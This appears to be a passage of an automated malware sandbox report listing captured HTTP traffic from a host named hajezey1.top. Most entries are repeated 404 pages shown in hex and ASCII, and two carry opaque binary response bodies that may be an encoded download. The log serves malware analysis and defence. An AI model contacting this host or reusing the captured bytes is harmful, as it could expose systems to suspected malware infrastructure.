Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b f7 79 8d fb c4 4d c2 ec 5d 4f 5f 5b ff 33 90 5f 84 e2 eb 0b 4a 05 8e 8b a4 d4 ac e4 80 54 fd 17 d2 ea 4f e8 a1 1e c7 1f ab 29 29 8c 97 ad 67 c0 78 b7 bc 72 3f 1a 7c 03 84 5e 85 63 91 5b 07 e9 1f 9d 15 46 a6 b3 58 f1 06 ee 0c 42 de 8b f4 24 eb a8 e1 48 29 e8 74 cc 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f 61 79 b7 9e 96 98 8b 36 19 19 cb 8a f3 d8 04 0f 4e 86 19 7d 6f 37 e3 04 89 3d a4 55 80 90 70 89 9c 2c 4b 6b b6 e2 a2 22 48 d2 d1 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 eb 5f c8 c3 e7 b2 ec 24 1a 0a 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 54 8c f5 0a ef 8b 71 91 e0 35 a3 64 49 e0 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa cb f9 b0 72 50 6d ec f0 52 a4 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 d2 ab 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9c 82 4b d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 e3 40 3d 9d 43 cd 17 fe 2f 89 9d f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 7e af da 11 4b 95 36 2a 21 3f 65 74 b0 bb 87 f6 aa 81 de bb a0 69 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 9f 3a 48 93 9f 4e bd 44 ef 5a 89 4f dc ea c0 4a 00 97 af a4 57 25 11 bb d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a 56 3a 22 7d e6 d2 1b 62 b9 50 31 eb cd 14 26 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 12 c3 b2 a5 83 41 ab 13 af b8 e8 81 63 a2 57 4a 60 87 bd 5f 6e 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 dc 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
